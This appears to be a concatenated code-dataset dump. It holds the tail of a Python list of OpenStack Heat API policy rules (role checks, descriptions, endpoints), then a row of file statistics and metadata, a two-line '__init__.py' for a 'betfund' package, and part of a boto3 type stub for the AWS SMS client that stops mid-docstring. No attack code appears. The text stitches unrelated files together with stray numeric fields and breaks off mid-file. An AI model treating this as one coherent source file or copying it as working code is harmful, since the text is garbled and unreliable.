"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Cancel stack operation without rolling back.",
scope_types=["system", "project"],
operations=[
{"method": "POST", "path": "/v1/{tenant_id}/stacks/{stack_name}/{stack_id}/actions"},
],
),
base.APIRule(
name="build_info:build_info",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
basic_check_str=("@"),
description="Show build information.",
scope_types=["system", "project"],
operations=[{"method": "GET", "path": "/v1/{tenant_id}/build_info"}],
),
base.APIRule(
name="events:index",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="List events.",
scope_types=["system", "project"],
operations=[
{"method": "GET", "path": "/v1/{tenant_id}/stacks/{stack_name}/{stack_id}/events"},
],
),
base.APIRule(
name="events:show",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="Show event.",
scope_types=["system", "project"],
operations=[
{
"method": "GET",
"path": "/v1/{tenant_id}/stacks/{stack_name}/{stack_id}/resources/{resource_name}/events/{event_id}",
},
],
),
base.APIRule(
name="resource:index",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="List resources.",
scope_types=["system", "project"],
operations=[
{"method": "GET", "path": "/v1/{tenant_id}/stacks/{stack_name}/{stack_id}/resources"},
],
),
base.APIRule(
name="resource:metadata",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s) or (role:heat_stack_user and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s or role:heat_stack_user"
),
description="Show resource metadata.",
scope_types=["system", "project"],
operations=[
{
"method": "GET",
"path": "/v1/{tenant_id}/stacks/{stack_name}/{stack_id}/resources/{resource_name}/metadata",
},
],
),
base.APIRule(
name="resource:signal",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s) or (role:heat_stack_user and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:heat_stack_user"
),
description="Signal resource.",
scope_types=["system", "project"],
operations=[
{
"method": "POST",
"path": "/v1/{tenant_id}/stacks/{stack_name}/{stack_id}/resources/{resource_name}/signal",
},
],
),
base.APIRule(
name="resource:mark_unhealthy",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Mark resource as unhealthy.",
scope_types=["system", "project"],
operations=[
{
"method": "PATCH",
"path": "/v1/{tenant_id}/stacks/{stack_name}/{stack_id}/resources/{resource_name_or_physical_id}",
},
],
),
base.APIRule(
name="resource:show",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="Show resource.",
scope_types=["system", "project"],
operations=[
{
"method": "GET",
"path": "/v1/{tenant_id}/stacks/{stack_name}/{stack_id}/resources/{resource_name}",
},
],
),
base.APIRule(
name="software_configs:global_index",
check_str=("role:reader and system_scope:all"),
basic_check_str=("role:admin or role:reader"),
description="List configs globally.",
scope_types=["system", "project"],
operations=[{"method": "GET", "path": "/v1/{tenant_id}/software_configs"}],
),
base.APIRule(
name="software_configs:index",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="List configs.",
scope_types=["system", "project"],
operations=[{"method": "GET", "path": "/v1/{tenant_id}/software_configs"}],
),
base.APIRule(
name="software_configs:create",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Create config.",
scope_types=["system", "project"],
operations=[{"method": "POST", "path": "/v1/{tenant_id}/software_configs"}],
),
base.APIRule(
name="software_configs:show",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="Show config details.",
scope_types=["system", "project"],
operations=[{"method": "GET", "path": "/v1/{tenant_id}/software_configs/{config_id}"}],
),
base.APIRule(
name="software_configs:delete",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Delete config.",
scope_types=["system", "project"],
operations=[{"method": "DELETE", "path": "/v1/{tenant_id}/software_configs/{config_id}"}],
),
base.APIRule(
name="software_deployments:index",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="List deployments.",
scope_types=["system", "project"],
operations=[{"method": "GET", "path": "/v1/{tenant_id}/software_deployments"}],
),
base.APIRule(
name="software_deployments:create",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Create deployment.",
scope_types=["system", "project"],
operations=[{"method": "POST", "path": "/v1/{tenant_id}/software_deployments"}],
),
base.APIRule(
name="software_deployments:show",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="Show deployment details.",
scope_types=["system", "project"],
operations=[
{"method": "GET", "path": "/v1/{tenant_id}/software_deployments/{deployment_id}"},
],
),
base.APIRule(
name="software_deployments:update",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Update deployment.",
scope_types=["system", "project"],
operations=[
{"method": "PUT", "path": "/v1/{tenant_id}/software_deployments/{deployment_id}"},
],
),
base.APIRule(
name="software_deployments:delete",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Delete deployment.",
scope_types=["system", "project"],
operations=[
{"method": "DELETE", "path": "/v1/{tenant_id}/software_deployments/{deployment_id}"},
],
),
base.APIRule(
name="software_deployments:metadata",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s) or (role:heat_stack_user and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s or role:heat_stack_user"
),
description="Show server configuration metadata.",
scope_types=["system", "project"],
operations=[
{
"method": "GET",
"path": "/v1/{tenant_id}/software_deployments/metadata/{server_id}",
},
],
),
base.APIRule(
name="stacks:abandon",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Abandon stack.",
scope_types=["system", "project"],
operations=[
{
"method": "DELETE",
"path": "/v1/{tenant_id}/stacks/{stack_name}/{stack_id}/abandon",
},
],
),
base.APIRule(
name="stacks:create",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Create stack.",
scope_types=["system", "project"],
operations=[{"method": "POST", "path": "/v1/{tenant_id}/stacks"}],
),
base.APIRule(
name="stacks:delete",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Delete stack.",
scope_types=["system", "project"],
operations=[
{"method": "DELETE", "path": "/v1/{tenant_id}/stacks/{stack_name}/{stack_id}"},
],
),
base.APIRule(
name="stacks:detail",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="List stacks in detail.",
scope_types=["system", "project"],
operations=[{"method": "GET", "path": "/v1/{tenant_id}/stacks"}],
),
base.APIRule(
name="stacks:export",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="Export stack.",
scope_types=["system", "project"],
operations=[
{"method": "GET", "path": "/v1/{tenant_id}/stacks/{stack_name}/{stack_id}/export"},
],
),
base.APIRule(
name="stacks:generate_template",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="Generate stack template.",
scope_types=["system", "project"],
operations=[
{"method": "GET", "path": "/v1/{tenant_id}/stacks/{stack_name}/{stack_id}/template"},
],
),
base.APIRule(
name="stacks:global_index",
check_str=("role:reader and system_scope:all"),
basic_check_str=("role:admin or role:reader"),
description="List stacks globally.",
scope_types=["system", "project"],
operations=[{"method": "GET", "path": "/v1/{tenant_id}/stacks"}],
),
base.APIRule(
name="stacks:index",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="List stacks.",
scope_types=["system", "project"],
operations=[{"method": "GET", "path": "/v1/{tenant_id}/stacks"}],
),
base.APIRule(
name="stacks:list_resource_types",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
basic_check_str=("@"),
description="List resource types.",
scope_types=["system", "project"],
operations=[{"method": "GET", "path": "/v1/{tenant_id}/resource_types"}],
),
base.APIRule(
name="stacks:list_template_versions",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
basic_check_str=("@"),
description="List template versions.",
scope_types=["system", "project"],
operations=[{"method": "GET", "path": "/v1/{tenant_id}/template_versions"}],
),
base.APIRule(
name="stacks:list_template_functions",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
basic_check_str=("@"),
description="List template functions.",
scope_types=["system", "project"],
operations=[
{
"method": "GET",
"path": "/v1/{tenant_id}/template_versions/{template_version}/functions",
},
],
),
base.APIRule(
name="stacks:lookup",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s) or (role:heat_stack_user and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s or role:heat_stack_user"
),
description="Find stack.",
scope_types=["system", "project"],
operations=[{"method": "GET", "path": "/v1/{tenant_id}/stacks/{stack_identity}"}],
),
base.APIRule(
name="stacks:preview",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Preview stack.",
scope_types=["system", "project"],
operations=[{"method": "POST", "path": "/v1/{tenant_id}/stacks/preview"}],
),
base.APIRule(
name="stacks:resource_schema",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
basic_check_str=("@"),
description="Show resource type schema.",
scope_types=["system", "project"],
operations=[{"method": "GET", "path": "/v1/{tenant_id}/resource_types/{type_name}"}],
),
base.APIRule(
name="stacks:show",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="Show stack.",
scope_types=["system", "project"],
operations=[{"method": "GET", "path": "/v1/{tenant_id}/stacks/{stack_identity}"}],
),
base.APIRule(
name="stacks:template",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="Get stack template.",
scope_types=["system", "project"],
operations=[
{"method": "GET", "path": "/v1/{tenant_id}/stacks/{stack_name}/{stack_id}/template"},
],
),
base.APIRule(
name="stacks:environment",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="Get stack environment.",
scope_types=["system", "project"],
operations=[
{
"method": "GET",
"path": "/v1/{tenant_id}/stacks/{stack_name}/{stack_id}/environment",
},
],
),
base.APIRule(
name="stacks:files",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="Get stack files.",
scope_types=["system", "project"],
operations=[
{"method": "GET", "path": "/v1/{tenant_id}/stacks/{stack_name}/{stack_id}/files"},
],
),
base.APIRule(
name="stacks:update",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Update stack.",
scope_types=["system", "project"],
operations=[{"method": "PUT", "path": "/v1/{tenant_id}/stacks/{stack_name}/{stack_id}"}],
),
base.APIRule(
name="stacks:update_patch",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Update stack (PATCH).",
scope_types=["system", "project"],
operations=[
{"method": "PATCH", "path": "/v1/{tenant_id}/stacks/{stack_name}/{stack_id}"},
],
),
base.APIRule(
name="stacks:update_no_change",
check_str=("rule:stacks:update_patch"),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Update stack (PATCH) with no changes.",
scope_types=["system", "project"],
operations=[
{"method": "PATCH", "path": "/v1/{tenant_id}/stacks/{stack_name}/{stack_id}"},
],
),
base.APIRule(
name="stacks:preview_update",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Preview update stack.",
scope_types=["system", "project"],
operations=[
{"method": "PUT", "path": "/v1/{tenant_id}/stacks/{stack_name}/{stack_id}/preview"},
],
),
base.APIRule(
name="stacks:preview_update_patch",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Preview update stack (PATCH).",
scope_types=["system", "project"],
operations=[
{"method": "PATCH", "path": "/v1/{tenant_id}/stacks/{stack_name}/{stack_id}/preview"},
],
),
base.APIRule(
name="stacks:validate_template",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Validate template.",
scope_types=["system", "project"],
operations=[{"method": "POST", "path": "/v1/{tenant_id}/validate"}],
),
base.APIRule(
name="stacks:snapshot",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Snapshot Stack.",
scope_types=["system", "project"],
operations=[
{
"method": "POST",
"path": "/v1/{tenant_id}/stacks/{stack_name}/{stack_id}/snapshots",
},
],
),
base.APIRule(
name="stacks:show_snapshot",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="Show snapshot.",
scope_types=["system", "project"],
operations=[
{
"method": "GET",
"path": "/v1/{tenant_id}/stacks/{stack_name}/{stack_id}/snapshots/{snapshot_id}",
},
],
),
base.APIRule(
name="stacks:delete_snapshot",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Delete snapshot.",
scope_types=["system", "project"],
operations=[
{
"method": "DELETE",
"path": "/v1/{tenant_id}/stacks/{stack_name}/{stack_id}/snapshots/{snapshot_id}",
},
],
),
base.APIRule(
name="stacks:list_snapshots",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="List snapshots.",
scope_types=["system", "project"],
operations=[
{"method": "GET", "path": "/v1/{tenant_id}/stacks/{stack_name}/{stack_id}/snapshots"},
],
),
base.APIRule(
name="stacks:restore_snapshot",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Restore snapshot.",
scope_types=["system", "project"],
operations=[
{
"method": "POST",
"path": "/v1/{tenant_id}/stacks/{stack_name}/{stack_id}/snapshots/{snapshot_id}/restore",
},
],
),
base.APIRule(
name="stacks:list_outputs",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="List outputs.",
scope_types=["system", "project"],
operations=[
{"method": "GET", "path": "/v1/{tenant_id}/stacks/{stack_name}/{stack_id}/outputs"},
],
),
base.APIRule(
name="stacks:show_output",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="Show outputs.",
scope_types=["system", "project"],
operations=[
{
"method": "GET",
"path": "/v1/{tenant_id}/stacks/{stack_name}/{stack_id}/outputs/{output_key}",
},
],
),
)
__all__ = ("list_rules",)
| 39.303448 | 238 | 0.585015 | 4,733 | 39,893 | 4.717515 | 0.037397 | 0.157202 | 0.104801 | 0.165935 | 0.914636 | 0.897886 | 0.892646 | 0.884405 | 0.884405 | 0.881673 | 0 | 0.001979 | 0.265184 | 39,893 | 1,014 | 239 | 39.342209 | 0.759705 | 0.000301 | 0 | 0.765347 | 0 | 0.116832 | 0.538905 | 0.245593 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.00099 | 0 | 0.00099 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
20e42b0760bd695c7563d341bb64cc368a52c816 | 120 | py | Python | betfund_event_broker/__init__.py | betfund/betfund-event-broker | 524aec73d9cf66cbeeb0fab67e6816b836c1d98e | [
"MIT"
] | 1 | 2020-09-23T02:36:35.000Z | 2020-09-23T02:36:35.000Z | betfund_event_broker/__init__.py | betfund/betfund-event-broker | 524aec73d9cf66cbeeb0fab67e6816b836c1d98e | [
"MIT"
] | 5 | 2020-04-13T23:55:07.000Z | 2020-06-04T15:09:12.000Z | betfund_event_broker/__init__.py | betfund/betfund-event-broker | 524aec73d9cf66cbeeb0fab67e6816b836c1d98e | [
"MIT"
] | null | null | null | """Betfund Event Broker namespace."""
from .flows import * # noqa: F403, F401
from .tasks import * # noqa: F403, F401
| 30 | 40 | 0.675 | 16 | 120 | 5.0625 | 0.6875 | 0.246914 | 0.345679 | 0.444444 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.122449 | 0.183333 | 120 | 3 | 41 | 40 | 0.704082 | 0.55 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
45b6187791563009ae33d98d57ecf55f4ca74025 | 113,677 | py | Python | boto3_type_annotations_with_docs/boto3_type_annotations/sms/client.py | cowboygneox/boto3_type_annotations | 450dce1de4e066b939de7eac2ec560ed1a7ddaa2 | [
"MIT"
] | 119 | 2018-12-01T18:20:57.000Z | 2022-02-02T10:31:29.000Z | boto3_type_annotations_with_docs/boto3_type_annotations/sms/client.py | cowboygneox/boto3_type_annotations | 450dce1de4e066b939de7eac2ec560ed1a7ddaa2 | [
"MIT"
] | 15 | 2018-11-16T00:16:44.000Z | 2021-11-13T03:44:18.000Z | boto3_type_annotations_with_docs/boto3_type_annotations/sms/client.py | cowboygneox/boto3_type_annotations | 450dce1de4e066b939de7eac2ec560ed1a7ddaa2 | [
"MIT"
] | 11 | 2019-05-06T05:26:51.000Z | 2021-09-28T15:27:59.000Z | from typing import Optional
from botocore.client import BaseClient
from typing import Dict
from botocore.paginate import Paginator
from datetime import datetime
from botocore.waiter import Waiter
from typing import Union
from typing import List
class Client(BaseClient):
def can_paginate(self, operation_name: str = None):
"""
Check if an operation can be paginated.
:type operation_name: string
:param operation_name: The operation name. This is the same name
as the method name on the client. For example, if the
method name is ``create_foo``, and you\'d normally invoke the
operation as ``client.create_foo(**kwargs)``, if the
``create_foo`` operation can be paginated, you can use the
call ``client.get_paginator(\"create_foo\")``.
:return: ``True`` if the operation can be paginated,
``False`` otherwise.
"""
pass
def create_app(self, name: str = None, description: str = None, roleName: str = None, clientToken: str = None, serverGroups: List = None, tags: List = None) -> Dict:
"""
Creates an application. An application consists of one or more server groups. Each server group contain one or more servers.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/sms-2016-10-24/CreateApp>`_
**Request Syntax**
::
response = client.create_app(
name='string',
description='string',
roleName='string',
clientToken='string',
serverGroups=[
{
'serverGroupId': 'string',
'name': 'string',
'serverList': [
{
'serverId': 'string',
'serverType': 'VIRTUAL_MACHINE',
'vmServer': {
'vmServerAddress': {
'vmManagerId': 'string',
'vmId': 'string'
},
'vmName': 'string',
'vmManagerName': 'string',
'vmManagerType': 'VSPHERE'|'SCVMM'|'HYPERV-MANAGER',
'vmPath': 'string'
},
'replicationJobId': 'string',
'replicationJobTerminated': True|False
},
]
},
],
tags=[
{
'key': 'string',
'value': 'string'
},
]
)
**Response Syntax**
::
{
'appSummary': {
'appId': 'string',
'name': 'string',
'description': 'string',
'status': 'CREATING'|'ACTIVE'|'UPDATING'|'DELETING'|'DELETED'|'DELETE_FAILED',
'statusMessage': 'string',
'replicationStatus': 'READY_FOR_CONFIGURATION'|'CONFIGURATION_IN_PROGRESS'|'CONFIGURATION_INVALID'|'READY_FOR_REPLICATION'|'VALIDATION_IN_PROGRESS'|'REPLICATION_PENDING'|'REPLICATION_IN_PROGRESS'|'REPLICATED'|'DELTA_REPLICATION_IN_PROGRESS'|'DELTA_REPLICATED'|'DELTA_REPLICATION_FAILED'|'REPLICATION_FAILED'|'REPLICATION_STOPPING'|'REPLICATION_STOP_FAILED'|'REPLICATION_STOPPED',
'replicationStatusMessage': 'string',
'latestReplicationTime': datetime(2015, 1, 1),
'launchStatus': 'READY_FOR_CONFIGURATION'|'CONFIGURATION_IN_PROGRESS'|'CONFIGURATION_INVALID'|'READY_FOR_LAUNCH'|'VALIDATION_IN_PROGRESS'|'LAUNCH_PENDING'|'LAUNCH_IN_PROGRESS'|'LAUNCHED'|'DELTA_LAUNCH_IN_PROGRESS'|'DELTA_LAUNCH_FAILED'|'LAUNCH_FAILED'|'TERMINATE_IN_PROGRESS'|'TERMINATE_FAILED'|'TERMINATED',
'launchStatusMessage': 'string',
'launchDetails': {
'latestLaunchTime': datetime(2015, 1, 1),
'stackName': 'string',
'stackId': 'string'
},
'creationTime': datetime(2015, 1, 1),
'lastModified': datetime(2015, 1, 1),
'roleName': 'string',
'totalServerGroups': 123,
'totalServers': 123
},
'serverGroups': [
{
'serverGroupId': 'string',
'name': 'string',
'serverList': [
{
'serverId': 'string',
'serverType': 'VIRTUAL_MACHINE',
'vmServer': {
'vmServerAddress': {
'vmManagerId': 'string',
'vmId': 'string'
},
'vmName': 'string',
'vmManagerName': 'string',
'vmManagerType': 'VSPHERE'|'SCVMM'|'HYPERV-MANAGER',
'vmPath': 'string'
},
'replicationJobId': 'string',
'replicationJobTerminated': True|False
},
]
},
],
'tags': [
{
'key': 'string',
'value': 'string'
},
]
}
**Response Structure**
- *(dict) --*
- **appSummary** *(dict) --*
Summary description of the application.
- **appId** *(string) --*
Unique ID of the application.
- **name** *(string) --*
Name of the application.
- **description** *(string) --*
Description of the application.
- **status** *(string) --*
Status of the application.
- **statusMessage** *(string) --*
A message related to the status of the application
- **replicationStatus** *(string) --*
Replication status of the application.
- **replicationStatusMessage** *(string) --*
A message related to the replication status of the application.
- **latestReplicationTime** *(datetime) --*
Timestamp of the application's most recent successful replication.
- **launchStatus** *(string) --*
Launch status of the application.
- **launchStatusMessage** *(string) --*
A message related to the launch status of the application.
- **launchDetails** *(dict) --*
Details about the latest launch of the application.
- **latestLaunchTime** *(datetime) --*
Latest time this application was launched successfully.
- **stackName** *(string) --*
Name of the latest stack launched for this application.
- **stackId** *(string) --*
Identifier of the latest stack launched for this application.
- **creationTime** *(datetime) --*
Time of creation of this application.
- **lastModified** *(datetime) --*
Timestamp of the application's creation.
- **roleName** *(string) --*
Name of the service role in the customer's account used by AWS SMS.
- **totalServerGroups** *(integer) --*
Number of server groups present in the application.
- **totalServers** *(integer) --*
Number of servers present in the application.
- **serverGroups** *(list) --*
List of server groups included in the application.
- *(dict) --*
A logical grouping of servers.
- **serverGroupId** *(string) --*
Identifier of a server group.
- **name** *(string) --*
Name of a server group.
- **serverList** *(list) --*
List of servers belonging to a server group.
- *(dict) --*
Represents a server.
- **serverId** *(string) --*
The identifier of the server.
- **serverType** *(string) --*
The type of server.
- **vmServer** *(dict) --*
Information about the VM server.
- **vmServerAddress** *(dict) --*
Information about the VM server location.
- **vmManagerId** *(string) --*
The identifier of the VM manager.
- **vmId** *(string) --*
The identifier of the VM.
- **vmName** *(string) --*
The name of the VM.
- **vmManagerName** *(string) --*
The name of the VM manager.
- **vmManagerType** *(string) --*
The type of VM management product.
- **vmPath** *(string) --*
The VM folder path in the vCenter Server virtual machine inventory tree.
- **replicationJobId** *(string) --*
The identifier of the replication job.
- **replicationJobTerminated** *(boolean) --*
Indicates whether the replication job is deleted or failed.
- **tags** *(list) --*
List of taags associated with the application.
- *(dict) --*
A label that can be assigned to an application.
- **key** *(string) --*
Tag key.
- **value** *(string) --*
Tag value.
:type name: string
:param name:
Name of the new application.
:type description: string
:param description:
Description of the new application
:type roleName: string
:param roleName:
Name of service role in customer\'s account to be used by AWS SMS.
:type clientToken: string
:param clientToken:
A unique, case-sensitive identifier you provide to ensure idempotency of application creation.
:type serverGroups: list
:param serverGroups:
List of server groups to include in the application.
- *(dict) --*
A logical grouping of servers.
- **serverGroupId** *(string) --*
Identifier of a server group.
- **name** *(string) --*
Name of a server group.
- **serverList** *(list) --*
List of servers belonging to a server group.
- *(dict) --*
Represents a server.
- **serverId** *(string) --*
The identifier of the server.
- **serverType** *(string) --*
The type of server.
- **vmServer** *(dict) --*
Information about the VM server.
- **vmServerAddress** *(dict) --*
Information about the VM server location.
- **vmManagerId** *(string) --*
The identifier of the VM manager.
- **vmId** *(string) --*
The identifier of the VM.
- **vmName** *(string) --*
The name of the VM.
- **vmManagerName** *(string) --*
The name of the VM manager.
- **vmManagerType** *(string) --*
The type of VM management product.
- **vmPath** *(string) --*
The VM folder path in the vCenter Server virtual machine inventory tree.
- **replicationJobId** *(string) --*
The identifier of the replication job.
- **replicationJobTerminated** *(boolean) --*
Indicates whether the replication job is deleted or failed.
:type tags: list
